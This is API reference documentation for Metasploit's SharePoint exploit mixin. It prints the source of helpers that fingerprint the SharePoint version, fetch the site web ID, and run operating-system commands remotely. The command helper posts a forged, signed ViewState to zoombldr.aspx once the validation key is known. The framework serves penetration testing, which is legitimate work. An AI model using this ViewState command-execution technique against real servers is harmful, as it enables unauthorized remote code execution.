Module: Msf::Exploit::Remote::HTTP::Sharepoint

Includes:
Msf::Exploit::Remote::HttpClient, ViewState
Defined in:
lib/msf/core/exploit/remote/http/sharepoint.rb

Overview

This module provides a way of interacting with sharepoint installations

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary collapse

Methods included from ViewState

#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Instance Method Details

#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil

Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.

Parameters:

  • cmd (String)

    The OS command to run on the remote system

  • validation_key (String)

    The remote system's validation key from the web.config file.

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (nil)

    This function doesn't return anything.

Raises:

  • (RuntimeError)

    This function will raise a RuntimeError via #fail_with if the command failed to execute.



24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24

def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
  vprint_status("Executing command: #{cmd}")

  res = send_request_cgi(http_request_opts.merge({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
    'vars_post' => {
      '__VIEWSTATE' => generate_viewstate_payload(
        cmd,
        extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
        algo: 'sha256',
        key: pack_viewstate_validation_key(validation_key)
      )
    }
  }))

  unless res
    fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
  end

  unless res.code == 200
    fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
  end

  vprint_good('Successfully executed command')
end

#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?

Get the site’s webID.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (String, nil)

    The webID if it was able to be recovered.



55
56
57
58
59
60
61
62
63
64
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55

def sharepoint_get_site_web_id(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
  }))

  return nil unless res&.code == 200

  res.get_xml_document.at('//d:Id')&.text
end

#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?

Get the SharePoint version number.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (Rex::Version, nil)

    The SharePoint version if it was able to be recovered.

See Also:



72
73
74
75
76
77
78
79
80
81
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72

def sharepoint_get_version(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  }))

  return nil unless /^(?<build>[\d.]+)/ =~ res&.headers['MicrosoftSharePointTeamServices']

  Rex::Version.new(build)
end